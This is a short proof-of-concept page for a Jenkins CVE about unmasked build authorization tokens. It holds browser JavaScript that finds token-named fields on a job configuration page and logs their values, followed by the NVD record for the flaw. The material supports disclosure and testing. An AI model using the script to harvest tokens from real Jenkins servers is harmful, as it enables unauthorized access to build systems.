CVE-2025-67638

// CVE-2025-67638 PoC - Jenkins Build Authorization Token Exposure // This PoC demonstrates how to extract exposed build tokens from Jenkins job config pages (async function() { console.log('[+] CVE-2025-67638 PoC - Jenkins Token Exposure Check'); // Check if on Jenkins page if (!window.location.href.includes('configure')) { console.log('[-] Please navigate to a Jenkins job configuration page'); return; } // Find build token input fields that are not properly masked const inputs = document.querySelectorAll('input[type="text"], input:not([type="password"])'); const tokenFields = []; inputs.forEach(input => { const name = input.name || ''; const id = input.id || ''; const label = document.querySelector('label[for="' + input.id + '"]')?.textContent || ''; // Look for token-related fields if (name.toLowerCase().includes('token') || id.toLowerCase().includes('token') || label.toLowerCase().includes('token')) { tokenFields.push({ name: name, id: id, value: input.value, type: input.type }); } }); if (tokenFields.length > 0) { console.log('[!] Exposed token fields found:'); tokenFields.forEach(field => { console.log('Field:', field.name, 'Value:', field.value, 'Type:', field.type); }); console.log('[+] PoC demonstrates CVE-2025-67638 vulnerability'); } else { console.log('[-] No exposed token fields found'); } })();

{"cve": {"id": "CVE-2025-67638", "sourceIdentifier": "[email protected]", "published": "2025-12-10T17:15:56.293", "lastModified": "2025-12-17T17:37:39.177", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins 2.540 and earlier, LTS 2.528.2 and earlier does not mask build authorization tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*", "versionEndExcluding": "2.528.3", "matchCriteriaId": "A276E9FE-7CB8-4B6B-A399-14C0E7B10BC4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.541", "matchCriteriaId": "F2388D03-0340-4C73-97B7-FB06AB6E972B"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-783", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}